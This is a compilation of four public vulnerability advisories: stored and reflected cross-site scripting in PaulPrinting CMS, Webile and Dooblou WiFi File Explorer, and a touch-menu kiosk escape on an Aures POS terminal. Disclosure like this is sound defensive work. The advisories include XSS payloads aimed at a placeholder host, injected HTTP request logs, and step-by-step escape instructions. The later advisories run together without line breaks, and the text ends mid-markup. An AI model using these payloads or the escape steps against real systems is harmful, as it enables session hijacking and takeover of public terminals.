PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities

References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2285

Release Date:  
=============  
2023-07-19

Vulnerability Laboratory ID (VL-ID):  
====================================  
2285

Common Vulnerability Scoring System:  
====================================  
5.8

Vulnerability Class:  
====================  
Cross Site Scripting - Persistent

Current Estimated Price:  
========================  
500€ - 1.000€

Product & Service Introduction:  
===============================  
PaulPrinting is designed feature rich, easy to use, search engine friendly, modern design and with a visually appealing interface.

(Copy of the Homepage:https://codecanyon.net/user/codepaul  )

Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered multiple persistent cross site vulnerabilities in the PaulPrinting (v2018) cms web-application.

Affected Product(s):  
====================  
CodePaul  
Product: PaulPrinting (2018) - CMS (Web-Application)

Vulnerability Disclosure Timeline:  
==================================  
2022-08-25: Researcher Notification & Coordination (Security Researcher)  
2022-08-26: Vendor Notification (Security Department)  
2022-**-**: Vendor Response/Feedback (Security Department)  
2022-**-**: Vendor Fix/Patch (Service Developer Team)  
2022-**-**: Security Acknowledgements (Security Department)  
2023-07-19: Public Disclosure (Vulnerability Laboratory)

Discovery Status:  
=================  
Published

Exploitation Technique:  
=======================  
Remote

Severity Level:  
===============  
Medium

Authentication Type:  
====================  
Restricted Authentication (User Privileges)

User Interaction:  
=================  
Low User Interaction

Disclosure Type:  
================  
Responsible Disclosure

Technical Details & Description:  
================================  
Multiple persistent input validation vulnerabilities has been discovered in the official PaulPrinting (v2018) cms web-application.  
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser  
to web-application requests from the application-side.

The first vulnerability is located in the register module. Remote attackers are able to register user account with malicious script code.  
After the registration to attacker provokes an execution of the malformed scripts on review of the settings or by user reviews of admins  
in the backend (listing).

The second vulnerability is located in the delivery module. Remote attackers with low privileged user accounts are able to inject own  
malicious script code to contact details. Thus allows to perform an execute on each interaction with users or by reviews of admins in  
the backend (listing).

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to  
malicious source and persistent manipulation of affected application modules.

Request Method(s):  
[+] POST

Vulnerable Module(s):  
[+] /printing/register  
[+] /account/delivery

Vulnerable Input(s):  
[+] First name  
[+] Last name  
[+] Address  
[+] City  
[+] State

Vulnerable Parameter(s):  
[+] firstname  
[+] lastname  
[+] address  
[+] city  
[+] state

Affected Module(s):  
[+] Frontend Settings (./printing/account/setting)  
[+] Frontend Delivery Address (./printing/account/delivery)  
[+] Backend User Preview Listing  
[+] Backend Delivery Address Contact Review

Proof of Concept (PoC):  
=======================  
The persistent input validation web vulnerabilities can be exploited by remote attackers with low privileged user account and low user interaction.  
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...  
1. Open your browser and start a http session tamper  
2. Register in the application by login click to register  
3. Inject to the marked vulnerable input fields your test payload  
4. Save the entry by submit via post method  
5. Login to the account and preview the settings  
Note: Administrators in the backend have the same wrong validated context that executes on preview of users  
6. The script code executes on preview of the profile - settings  
7. Successful reproduce of the first vulnerability!  
8. Followup by opening the Delivery address module  
9. Add a contact and add in the same vulnerable marked input fields your test payload  
Note: T he script code executes on each review of the address in the backend or user frontend  
10. Successful reproduce of the second vulnerability!

Exploitation: Payload  
"<iframe src=evil.source onload(alert(document.cookie)>  
"<iframe src=evil.source onload(alert(document.domain)>

--- PoC Session Logs (POST) ---  
https://paulprinting.localhost:8000/printing/account/setting  
Host: paulprinting.localhost:8000  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 357  
Origin:https://paulprinting.localhost:8000  
Connection: keep-alive  
Referer:https://paulprinting.localhost:8000/printing/account/setting  
Cookie: member_login=1; member_id=123; session_id=13446428fe6e202a3be0e0ce23f0e5cd;  
POST:  
title=Mr.&firstname=a"<iframe src=evil.source onload(alert(document.cookie)>>  
&lastname=b"<iframe src=evil.source onload(alert(document.cookie)>>  
&address=c"<iframe src=evil.source onload(alert(document.cookie)>>  
&city=d"<iframe src=evil.source onload(alert(document.cookie)>>  
&state=e"<iframe src=evil.source onload(alert(document.cookie)>>  
&zipcode=2342&country=BS&phone=23523515235235&save=Save  
-  
POST: HTTP/3.0 302 Found  
content-type: text/html; charset=UTF-8  
x-powered-by: PHP/7.1.33  
location:https://paulprinting.localhost:8000/printing/account/setting?save=1  
-  
https://paulprinting.localhost:8000/printing/account/setting?save=1  
Host: paulprinting.localhost:8000  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Referer:https://paulprinting.localhost:8000/printing/account/setting  
Connection: keep-alive  
Cookie: member_login=1; member_id=123; session_id=13446428fe6e202a3be0e0ce23f0e5cd;  
-  
POST: HTTP/3.0 200 OK  
content-type: text/html; charset=UTF-8  
x-powered-by: PHP/7.1.33

Vulnerable Source: Your Account - Settings  
<div class="form-group row">  
<label class="col-sm-4 col-form-label">First name</label>  
<div class="col-sm-8">  
<input type="text" name="firsttname" class="form-control" value="a"<iframe src=evil.source onload(alert(document.cookie)>">  
</div></div>  
<label class="col-sm-4 col-form-label">Last name</label>  
<div class="col-sm-8">  
<input type="text" name="lastname" class="form-control" value="b"<iframe src=evil.source onload(alert(document.cookie)>">  
</div></div>  
<div class="form-group row">  
<label class="col-sm-4 col-form-label">Address</label>  
<div class="col-sm-8">  
<input type="text" name="address" class="form-control" value="c"<iframe src=evil.source onload(alert(document.cookie)>">  
</div></div>  
<div class="form-group row">  
<label class="col-sm-4 col-form-label">City</label>  
<div class="col-sm-8">  
<input type="text" name="city" class="form-control" value="d"<iframe src=evil.source onload(alert(document.cookie)>">  
</div></div>  
<div class="form-group row">  
<label class="col-sm-4 col-form-label">State</label>  
<div class="col-sm-8">  
<input type="text" name="state" class="form-control" value="e"<iframe src=evil.source onload(alert(document.cookie)>">  
</div></div>

Vulnerable Source: Deliery Contact (Address)  
<table class="table">  
<thead>  
<tr>  
<th>Contact</th>  
<th>Address</th>  
<th>City</th>  
<th>State</th>  
<th>Country</th>  
<th></th>  
</tr>  
</thead>  
<tbody><tr>  
<td>a"<iframe src=evil.source onload(alert(document.cookie)></td>  
<td>b"<iframe src=evil.source onload(alert(document.cookie)></td>  
<td>c"<iframe src=evil.source onload(alert(document.cookie)></td>  
<td>d"<iframe src=evil.source onload(alert(document.cookie)></td>  
<td></td>  
<td class="text-right">  
<a href="https://paulprinting.localhost:8000/printing/account/delivery?id=10">Edit</a>|  
<a href="https://paulprinting.localhost:8000/printing/account/delivery?id=10&delete=1"  onclick="return confirm('Delete')">Delete</a>  
</td></tr></tbody>  
</table>

Security Risk:  
==============  
The security risk of the cross site scripting web vulnerabilities with persistent attack vector are estimated as medium.

Credits & Authors:  
==================  
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab  
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits  
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do  
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.  
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:www.vulnerability-lab.com    www.vuln-lab.com        www.vulnerability-db.com

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.  
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other  
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other  
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or  
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™

--   
VULNERABILITY LABORATORY (VULNERABILITY LAB)  
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

PaulPrinting CMS Cross Site Scripting

Aures Booking and POS Terminal suffers from a local privilege escalation vulnerability.

Document Title:  
===============  
Aures Booking & POS Terminal - Local Privilege Escalation

References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2323

Release Date:  
=============  
2023-07-17

Vulnerability Laboratory ID (VL-ID):  
====================================  
2323

Common Vulnerability Scoring System:  
====================================  
7.2

Vulnerability Class:  
====================  
Privilege Escalation

Current Estimated Price:  
========================  
3.000€ - 4.000€

Product & Service Introduction:  
===============================  
KOMET is an interactive, multifunctional kiosk and specially designed for the fast food industry. Available as a wall-mounted or  
freestanding model, its design is especially adapted to foodservice such as take-aways or fast food in system catering. The kiosk  
features a 27 YUNO touch system in portrait mode, an ODP 444 thermal receipt printer, a payment terminal and a 2D barcode scanner.  
With a click, the customer selects, books, orders, purchases and pays directly at the kiosk. The system offers the possibility to  
manage customer cards and promotions. Queue management can also be optimized.

(Copy of the Homepage:https://aures.com/de/komet/  )

Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered a local kiosk privilege escalation vulnerability in the operating system of  
the Aures Komet Booking & POS Terminal (Windows 10 IoT Enterprise) used by the german company immergrün franchise gmbh.

Affected Product(s):  
====================  
Aures Technologies GmbH  
Product: Aures Komet Booking & POS Terminal - (KIOSK) (Windows 10 IoT Enterprise)

Vulnerability Disclosure Timeline:  
==================================  
2023-05-09: Researcher Notification & Coordination (Security Researcher)  
2023-07-17: Public Disclosure (Vulnerability Laboratory)

Discovery Status:  
=================  
Published

Exploitation Technique:  
=======================  
Local

Severity Level:  
===============  
High

Authentication Type:  
====================  
Open Authentication (Anonymous Privileges)

User Interaction:  
=================  
No User Interaction

Disclosure Type:  
================  
Responsible Disclosure

Technical Details & Description:  
================================  
A kiosk mode escalation vulnerability has been discovered in the operating system of the Aures Komet Booking & POS Terminal  
(Windows 10 IoT Enterprise) used by the german company immergrün franchise gmbh. The security vulnerability allows local attackers  
to bypass the kiosk mode to compromise the local file system and applications.

It is possible for local attackers to escalate out of the kiosk mode in the aures komet booking & pos terminal. Local attackers are  
able to use the touch functionalities in the aures komet booking & pos terminal system to escalate with higher privileges. The security  
vulnerability is located in the context menu function of the extended menu on touch interaction. Attackers with restricted low local  
privileged access to the booking service front display are able to execute files, can unrestricted download contents or exfiltrate  
local file-system information of the compromised windows based operating system.

No keyboard or connections are required to manipulate the service booking and payment terminal. The booking and payment terminal system  
vulnerability requires no user user interaction to become exploited and can only be triggered by local physical device access.

Vulnerable Operating System(s):  
[+] Windows 10 (IoT Enterprise)

Affected Component(s):  
[+] Context Menu

Affected Function(s):  
[+] Web Search  
[+] Share (Teilen)

Proof of Concept (PoC):  
=======================  
The local vulnerability can be exploited by local attackers with physical device access without user interaction.  
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Sheet  
Touch Display => Select Food Item => Highlight Text  
=> Open Context Menu => Extend Context Menu => Web-Search  
=> Browser => Local File System => Compromised!

Manual steps to reproduce the vulnerability ...  
01.  First touch the monitor display to move on from standby  
02.  Select an food item from the menu of immergrün (we recomment the cesar wraps)  
03.  Push the information button of the selected food item  
04.  Push twice via touch to mark the selected food item text  
05.  Press a third time after you have marked the context by holding it down on the touch display  
06.  Now the function context menu of the operating system for highlighted text appears  
07.  On the context menu appearing 3 dots to extend the visible function menu  
08.  Select the web-search or share function for the highlighted content in the context menu  
09.  The browser of the operating system opens on the main front screen  
10.1 By now you are able to download an execute executables using the browser without any blacklisting (Unrestricted Web Access - Download of Files)  
10.2 Attackers can open websites on the fron display to manipulate the visible content (Scam & Spam - Web Messages & Web Context)  
10.3 Attackers are able to manipulate via browser debugger the web content displayed from immergrün (Phishing - Formular & Banking Information)  
10.4 Attackers are able to access the local file system and compromise it by reconfiguration with privileged user account (Local File-System - Privilege Escaltion)  
10.5 Attackers are able to infect the local operating system with ransomware or other malicious programs and scripts (Malware - Ransomware, Keylogger, Trojan-Banking & Co.)  
10.6 Attackers are able to exfiltrate data from the local computer system using web connecting and available protocols  
10.7 Attackers are able to perform man in the middle attacks from the local computer system  
11.0 Successful reproduce of the security vulnerability!

Reference(s): Pictures  
- 1.png (Terminal A)  
- 2.png (Terminal B)  
- 3.png (Escape)  
- 4.png (Awareness)

Solution - Fix & Patch:  
=======================  
The security vulnerabilities can be patched by following steps:  
1.  Disable the content menu to extend  
2.  Disable the context menu  
3.  Disable web-search  
4.  Disable to mark text inputs & texts  
5.  Disallow to open not white listed websites  
6.  Disable to download files  
7.  Restrict the web-browser access  
8.  Disallow the file browser  
9.  Disable the browser debug modus  
10. Reconfigure the local firewall to allow and disallow connections  
11. Change the access permission to prevent exfiltration

Security Risk:  
==============  
The security risk of the vulnerability in the local booking and payment terminal system is considered high.  
The issue can be easily exploited by local attackers with simple interaction via the touch display.  
Once compromised, the attackers can fully manipulate the computer's operating system and use it misuse  
it for further simple or more complex attack scenarios.

Credits & Authors:  
==================  
Benjamin Mejri (Kunz)   -https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.  
Lars Guenther     -https://www.vulnerability-lab.com/show.php?user=L.+Guenther

Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab  
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits  
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do  
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.  
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.com

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.  
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other  
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other  
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or  
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™

--   
VULNERABILITY LABORATORY (VULNERABILITY LAB)  
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Aures Booking And POS Terminal Local Privilege Escalation

Webile version 1.0.1 suffers from multiple cross site scripting vulnerabilities.

    Document Title:===============Webile v1.0.1 - Multiple Cross Site Web VulnerabilitiesReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2321Release Date:=============2023-07-03Vulnerability Laboratory ID (VL-ID):====================================2321Common Vulnerability Scoring System:====================================5.5Vulnerability Class:====================Cross Site Scripting - PersistentCurrent Estimated Price:========================500€ - 1.000€Product & Service Introduction:===============================Webile, is a local area network cross-platform file management tool based on http protocol. Using the personal mobile phone as a server inthe local area network, browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data,statistics files, displaying performance, etc. No need to connect to the Internet, you can browse files, send data, play videos and otherfunctions through WiFi LAN or mobile phone hotspot, and no additional data traffic will be generated during data transmission. Support Mac,Windows, Linux, iOS, Android and other multi-platform operating systems.(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US  )Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered multiple persistent web vulnerabilities in the Webile v1.0.1 Wifi mobile android web application.Affected Product(s):====================Product Owner: WebileProduct: Webile v1.0.1 - (Framework) (Mobile Web-Application)Vulnerability Disclosure Timeline:==================================2022-10-11: Researcher Notification & Coordination (Security Researcher)2022-10-12: Vendor Notification (Security Department)2022-**-**: Vendor Response/Feedback (Security Department)2022-**-**: Vendor Fix/Patch (Service Developer Team)2022-**-**: Security Acknowledgements (Security Department)2023-07-03: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation Technique:=======================RemoteSeverity Level:===============MediumAuthentication Type:====================Restricted Authentication (Guest Privileges)User Interaction:=================Low User InteractionDisclosure Type:================Independent Security ResearchTechnical Details & Description:================================Multiple persistent input validation web vulnerabilities has been discoveredin the Webile v1.0.1 Wifi mobile android web application.The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser toweb-application requests from the application-side.The persistent input validation web vulnerabilities are located in the send and add function. Remote attackers are able to inject own maliciousscript codes to the new_file_name and i parameter post method request to provoke a persistent execution of the malformed content.Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicioussource and persistent manipulation of affected application modules.Request Method(s):[+] POSTVulnerable Parameter(s):[+] new_file_name[+] iProof of Concept (PoC):=======================The persistent input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction.For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.Vulnerable Source: SendSend message to phone listing<div class="layui-colla-item"><div class="layui-card-header">Message</div><div class="layui-colla-content" style="display:block;padding-left:16px;"><div class="layui-form-item layui-form-text" id="showMsg"><div><font color="blue">20:10:11</font><a href="javascript:;"  title="Copy" onclick="copy(1658081411827)"><i class="iconfont">&nbsp;&nbsp;</i></a><br><span id="c_1658081411827">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span><br><br></div></div></div></div>history logs messages<table class="layui-table layui-form"><thead><tr><th style="text-align: center;vertical-align: middle!important;border-left-width:1px;border-right-width:1px;height:32px;" width="2%" align="center"><input type="checkbox" lay-filter="checkall" name="" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div></th><th style="border-right-width:1px;">Message</th><th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="15%">Date</th><th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="3%" valign="center">Action</th></tr></thead><tbody><tr><td style="text-align: center;vertical-align: middle!important;border-left-width:1px;min-height:180px;" align="center"><input type="checkbox" name="id" value="3" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div></td><td style="height:32px;"> <span id="c_3">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span></td><td align="center">2022/07/17 20:10</td><td class="td-manage" style="border-right-width:1px;text-align:center;"><a title="Copy" onclick="copy(3)" href="javascript:;"><i class="iconfont">&nbsp;&nbsp;</i></a><a title="Delete" onclick="deleteLog(this,3)" href="javascript:;"><i class="layui-icon">&nbsp;&nbsp;</i></a></td></tr></tbody></table>--- PoC Session Logs #1 (POST) ---  (Add)http://localhost:8080/file_actionHost: localhost:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 210Origin:http://localhost:8080Connection: keep-aliveReferer:http://localhost:8080/webile_filesCookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6i={"action":"create","file_path":"/storage/emulated/0","new_file_name":"pwnd23>"<iimg src=evil.source onload=alert(document.cookie)></iimg>"}-POST: HTTP/1.1 200 OKContent-Type: application/jsonConnection: keep-aliveContent-Encoding: gzipTransfer-Encoding: chunked-http://localhost:8080/evil.sourceHost: localhost:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveReferer:http://localhost:8080/webile_filesCookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6Upgrade-Insecure-Requests: 1-GET: HTTP/1.1 200 OKContent-Type: application/octet-streamConnection: keep-aliveContent-Length: 0-Cookie:treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6--- PoC Session Logs #2 (POST) ---  (Send)http://localhost:8080/sendHost: localhost:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 180Origin:http://localhost:8080Connection: keep-aliveReferer:http://localhost:8080/webile_sendCookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6i={"os":"Windows Windows 10","b":"firefox 102.0","c":">"<iimg src=evil.source onload=alert(document.cookie)></iimg>"}-POST: HTTP/1.1 200 OKContent-Type: application/jsonConnection: keep-aliveContent-Encoding: gzipTransfer-Encoding: chunked-http://localhost:8080/evil.sourceHost: localhost:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveReferer:http://localhost:8080/webile_sendCookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6Upgrade-Insecure-Requests: 1-GET: HTTP/1.1 200 OKContent-Type: application/octet-streamDate: Sun, 17 Jul 2022 18:08:33 GMTConnection: keep-aliveContent-Length: 0Security Risk:==============The security risk of the persistent web vulnerabilities in the mobile web application is estimated as medium.Credits & Authors:==================Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.comAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Webile 1.0.1 Cross Site Scripting

Dooblou WiFi File Explorer version 1.13.3 suffers from multiple cross site scripting vulnerabilities.

    Document Title:===============Dooblou WiFi File Explorer 1.13.3 - Multiple VulnerabilitiesReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2317Release Date:=============2023-07-04Vulnerability Laboratory ID (VL-ID):====================================2317Common Vulnerability Scoring System:====================================5.1Vulnerability Class:====================MultipleCurrent Estimated Price:========================500€ - 1.000€Product & Service Introduction:===============================Browse, download and stream individual files that are on your Android device, using a web browser via a WiFi connection.No more taking your phone apart to get the SD card out or grabbing your cable to access your camera pictures and copy across your favourite MP3s.(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.dooblou.WiFiFileExplorer  )Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered multiple web vulnerabilities in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application.Affected Product(s):====================Product Owner: dooblouProduct: Dooblou WiFi File Explorer v1.13.3 - (Android) (Framework) (Wifi) (Web-Application)Vulnerability Disclosure Timeline:==================================2022-01-19: Researcher Notification & Coordination (Security Researcher)2022-01-20: Vendor Notification (Security Department)2022-**-**: Vendor Response/Feedback (Security Department)2022-**-**: Vendor Fix/Patch (Service Developer Team)2022-**-**: Security Acknowledgements (Security Department)2023-07-04: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation Technique:=======================RemoteSeverity Level:===============MediumAuthentication Type:====================Restricted Authentication (Guest Privileges)User Interaction:=================Low User InteractionDisclosure Type:================Independent Security ResearchTechnical Details & Description:================================Multiple input validation web vulnerabilities has been discovered in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application.The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise browser to web-applicationrequests from the application-side.The vulnerabilities are located in the `search`, `order`, `download`, `mode` parameters. The requested content via get method request is insecure validatedand executes malicious script codes. The attack vector is non-persistent and the rquest method to inject is get. Attacker do not need to be authorized toperform an attack to execute malicious script codes. The links can be included as malformed upload for example to provoke an execute bby a view of thefront- & backend of the wifi explorer.Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicioussource and non-persistent manipulation of affected application modules.Proof of Concept (PoC):=======================The input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction.For security demonstration or to reproduce the web vulnerabilities follow the provided information and steps below to continue.PoC: Exploitationhttp://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source"  onmouseover=alert(document.domain)><br>PLEASE CLICK PATH TO RETURN INDEX</a>http://localhost:8000/storage/emulated/0/Download/?mode=31&search=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert%28document.domain%29%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX%3C%2Fa%3E&x=3&y=3http://localhost:8000/storage/emulated/0/Download/?mode=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3http://localhost:8000/storage/emulated/?order=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEXVulnerable Sources: Execution Points<table width="100%" cellspacing="0" cellpadding="16" border="0"><tbody><tr><tdstyle="vertical-align:top;"><table style="background-color: #FFA81E;background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png);background-repeat: repeat-x; background-position:top;" width="700"cellspacing="3" cellpadding="5" border="0"><tbody><tr><td><center><spanclass="doob_large_text">ERROR</span></center></td></tr></tbody></table><br><table style="background-color: #B2B2B2; background-image:url(/x99_dooblou_res/x99_dooblou_gradient.png); background-repeat: repeat-x; background-position:top;" width="700" cellspacing="3" cellpadding="5" border="0"><tbody><tr><td><span class="doob_medium_text">Cannot find file ordirectory! /storage/emulated/0/Download/<a href="https://evil.source"  onmouseover="alert(document.domain)"><br>PLEASE CLICK USER PATH TO RETURNINDEX</a></span></td></tr></tbody></table><br><span class="doob_medium_text"><span class="doob_link">&nbsp;&nbsp;<ahref="/">>>&nbsp;Back ToFiles&nbsp;>></a></span></span><br></td></tr></tbody></table><br>-<li></li></ul></span></span></td></tr></tbody></table></div><div class="body row scroll-x scroll-y"><table width="100%" cellspacing="0" cellpadding="6" border="0"><tbody><tr><td style="vertical-align:top;" width="100%"><form name="multiSelect" style="margin: 0px; padding: 0px;" action="/storage/emulated/0/Download/" enctype="multipart/form-data" method="POST"><input type="hidden" name="fileNames" value=""><table width="100%" cellspacing="0" cellpadding="1" border="0" bgcolor="#000000"><tbody><tr><td><table width="100%" cellspacing="2" cellpadding="3" border="0" bgcolor="#FFFFFF"><tbody><tr style="background-color: #FFA81E; background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png);background-repeat: repeat-x; background-position:top;" height="30"><td colspan="5"><table width="100%" cellspacing="0" cellpadding="0" border="0"><tbody><tr><td style="white-space:nowrap;vertical-align:middle"><span class="doob_small_text_bold">&nbsp;</span></td><td style="white-space: nowrap;vertical-align:middle" align="right"><span class="doob_small_text_bold">&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=23&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN INDEX&search=a"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_details.png" alt="img" title="Details"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=24&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN INDEX&search=a"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_thumbnails.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=38&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN I-<td style="white-space: nowrap;vertical-align:middle"><input value="" type="checkbox" name="selectAll" onclick="setCheckAll();">&nbsp;&nbsp;<a class="doob_button"href="javascript:setMultiSelect('/storage/emulated/', 'action', '18&order=>" <<="">>"<a href="https://evil.source"  onmouseover=alert(document.domain)">');javascript:document.multiSelect.submit();"style="">Download</a>&nbsp;<a class="doob_button" href="javascript:setMultiSelectConfirm('Are  you sure you want to delete? This cannot be undone!', '/storage/emulated/', 'action','13&order=>"<<><a href="https://evil.source"  onmouseover=alert(document.domain)>');javascript:document.multiSelect.submit();" style="">Delete</a>&nbsp;<a class="doob_button" href='javascript:setMultiSelectPromptQuery("Create Copy","/storage/emulated/", "/storage/emulated/", "action", "35&order=>"<<<a href="https://evil.source"  onmouseover=alert(document.domain)>", 